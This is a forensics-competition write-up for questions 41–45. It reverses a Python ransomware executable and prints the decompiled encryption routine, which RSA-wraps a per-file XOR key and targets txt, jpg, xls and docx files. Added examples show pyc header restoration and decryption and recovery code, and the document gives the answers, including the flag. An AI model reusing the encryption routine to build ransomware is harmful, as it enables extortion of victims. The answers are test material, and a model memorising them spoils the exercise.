exe analysis
Analyze all the evidence material in hand, locate the document that was encrypted in the ransom email together with the corresponding encryption/decryption programs, and answer the following questions.
41. Analyze the encryption program: the language it was compiled from is
python
42. Analyze the encryption program: which file extensions does it encrypt?
PyInstaller reversing
Only then did I notice that the Python version above seemed to be throwing a warning, so I switched to Python 3.6.8.
In the encrypt_file.exe_extracted directory produced by the extraction, go into PYZ-00.pyz_extracted, pick any .pyc file, copy its first 12 bytes (as hex) to the front of encrypt_file_1, and change the suffix to .pyc.
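The header-copy step above can be done programmatically. The script below is an added example, not part of the writeup: it takes the pyc header from any module in PYZ-00.pyz_extracted (those modules keep their header, the entry point does not) and prepends it to the header-less entry-point file. The header length is derived from the magic number instead of being hard-coded to 12, so it also works for builds made with Python 3.7+, where the header is 16 bytes. File names and the function names are assumptions for this example.

```python
# Added example (not the writeup's own code): rebuild a runnable .pyc from the
# header-less entry-point file that a PyInstaller extractor leaves behind.
import struct
import sys
from pathlib import Path


def pyc_header_len(magic: bytes) -> int:
    """Header length implied by the first 4 bytes (magic) of a .pyc file."""
    if len(magic) < 4 or magic[2:4] != b"\r\n":
        raise ValueError("not a pyc magic number")
    version_tag = struct.unpack("<H", magic[:2])[0]
    # Python 3.6: magic(4) + mtime(4) + source size(4) = 12 bytes (what the writeup copies).
    # PEP 552 (Python 3.7, magic >= 3390) widened the header to 16 bytes.
    return 16 if version_tag >= 3390 else 12


def restore_pyc(headerless: bytes, reference_pyc: bytes) -> bytes:
    """Prepend the header of a reference .pyc (same interpreter version) to a
    header-less marshalled code object."""
    n = pyc_header_len(reference_pyc[:4])
    header = reference_pyc[:n]
    if headerless[:4] == header[:4]:
        raise ValueError("file already carries a pyc header")
    return header + headerless


def restore_pyc_file(headerless_path, reference_path, out_path) -> int:
    """File-based wrapper; returns the number of bytes written."""
    data = restore_pyc(Path(headerless_path).read_bytes(),
                       Path(reference_path).read_bytes())
    Path(out_path).write_bytes(data)
    return len(data)


if __name__ == "__main__":
    # usage (paths are placeholders):
    #   python restore_pyc.py encrypt_file_1 PYZ-00.pyz_extracted/<any>.pyc encrypt_file_1.pyc
    print(restore_pyc_file(sys.argv[1], sys.argv[2], sys.argv[3]))
```

The reference module must come from the same extracted archive, because the magic has to match the interpreter that uncompyle6 (or decompyle3 for newer versions) expects; a mismatched header is the usual cause of the "bad magic number" error at this step.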
PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc
C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --
# Successfully decompiled file
Look at the decompiled .py file:
import os
import time
from Crypto.PublicKey import RSA
# the decompiled name Cipher_pkcs1_v1_5 corresponds to this PyCryptodome import (assumed)
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5

# Fragment of the decompiled encrypt_file.py. filepath, filename, ExtensionPath
# (the file's extension) and pubkey come from the enclosing directory-walk loop.
if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:
    time.sleep(3)
    data_file = os.path.join(filepath, filename)
    rsakey = RSA.import_key(pubkey)
    cipher = Cipher_pkcs1_v1_5.new(rsakey)
    xor_key = os.urandom(16)                      # fresh 16-byte XOR key per file
    xor_obj = XORCBC(xor_key)
    outf = open(data_file + '_encrypted', 'wb')
    encrypted_xor_key = cipher.encrypt(xor_key)   # key wrapped with the RSA public key
    outf.write(encrypted_xor_key)                 # RSA blob is written first
    buffer_size = 4096
    with open(data_file, 'rb') as f:
        while True:
            data = f.read(buffer_size)
            if not data:
                break
            outf.write(xor_obj.encrypt(data))     # XORCBC state carries across chunks
txt, jpg, xls, docx
43. Analyze the encryption program: what algorithm does it use to encrypt the files?
class XORCBC:
    def __init__(self, key: bytes):
        self.key = bytearray(key)   # the 16 bytes from os.urandom(16)
        self.cur = 0                # index into the rolling key

    def encrypt(self, data: bytes) -> bytes:
        data = bytearray(data)
        for i in range(len(data)):
            tmp = data[i]                       # remember the plaintext byte
            data[i] ^= self.key[self.cur]       # XOR with the current key byte
            self.key[self.cur] = tmp            # plaintext byte replaces the key byte (the "CBC" part)
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(data)
XOR
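The following is an added example, not code from the writeup or from the ransomware. It re-implements XORCBC with its inverse, parses the `_encrypted` layout shown in the decompiled fragment (RSA-wrapped key first, then the XOR stream), and shows why the scheme is weak: because each key byte is overwritten with the plaintext byte it just encrypted, every ciphertext byte after the first 16 is simply `p[i] ^ p[i-16]`, so knowing the first 16 plaintext bytes (a file-format header) recovers the whole file without the private key. `unwrap_key`, `rsa_key_len` and the function names are assumptions for this example; 256 is the wrapped-key size for the 2048-bit key in the writeup.

```python
# Added example (not from the writeup): XORCBC decryption, file layout, and the
# known-prefix recovery that follows from the key-update rule.


class XORCBC:
    """Same construction as the decompiled class, plus the inverse operation."""

    def __init__(self, key: bytes):
        self.key = bytearray(key)
        self.cur = 0

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray(data)
        for i in range(len(out)):
            p = out[i]
            out[i] ^= self.key[self.cur]
            self.key[self.cur] = p              # key byte replaced by the plaintext byte
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray(data)
        for i in range(len(out)):
            out[i] ^= self.key[self.cur]        # recover the plaintext byte
            self.key[self.cur] = out[i]         # mirror the encryptor's key update
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(out)


def decrypt_encrypted_file(blob: bytes, unwrap_key, rsa_key_len: int = 256,
                           chunk: int = 4096) -> bytes:
    """blob = RSA-wrapped XOR key || XORCBC ciphertext (layout from encrypt_file.py).
    unwrap_key(wrapped) -> 16-byte key, e.g. PKCS1_v1_5 decryption with the private key
    (passed in as a callable so this example runs without a key or PyCryptodome)."""
    wrapped, body = blob[:rsa_key_len], blob[rsa_key_len:]
    xor = XORCBC(unwrap_key(wrapped))
    # decrypt chunk by chunk exactly as the encryptor wrote it; state carries over
    return b"".join(xor.decrypt(body[i:i + chunk]) for i in range(0, len(body), chunk))


def recover_without_key(ciphertext: bytes, known_prefix: bytes) -> bytes:
    """Recover a file from its XORCBC ciphertext given the first len(key) plaintext
    bytes (16 here). For i >= k the key byte in use is p[i-k], so p[i] = c[i] ^ p[i-k];
    the RSA-wrapped key only ever protects the first k bytes."""
    k = len(known_prefix)
    plain = bytearray(known_prefix[:len(ciphertext)])
    for i in range(k, len(ciphertext)):
        plain.append(ciphertext[i] ^ plain[i - k])
    return bytes(plain)


if __name__ == "__main__":
    # constructed sample: a 16-byte key and a docx-like plaintext that starts with "PK\x03\x04"
    key = bytes(range(16))
    pt = b"PK\x03\x04 constructed plaintext long enough to roll the key several times"
    ct = XORCBC(key).encrypt(pt)
    print(XORCBC(key).decrypt(ct) == pt)                 # True
    print(recover_without_key(ct, pt[:16]) == pt)        # True, no key needed
```

For incident response this means two things: the decryptor only needs the 16-byte key that comes out of the RSA unwrap (so recovering `decrypt_file.exe` and its password, as in question 45, is enough to restore every file), and even without it, files whose first 16 bytes are predictable from their format can be restored directly from the ciphertext.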
44. Analyze the encryption program: what are the last 5 characters of the public key of the asymmetric scheme it uses?
pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'
u+w==
45. In the encrypted document, what is the value of FLAG1? (FLAG is an 8-character string, e.g. "FLAG9:QWERT123")
Reverse decrypt_file.exe with the same method.
Decrypt using the password.
TREFWGFS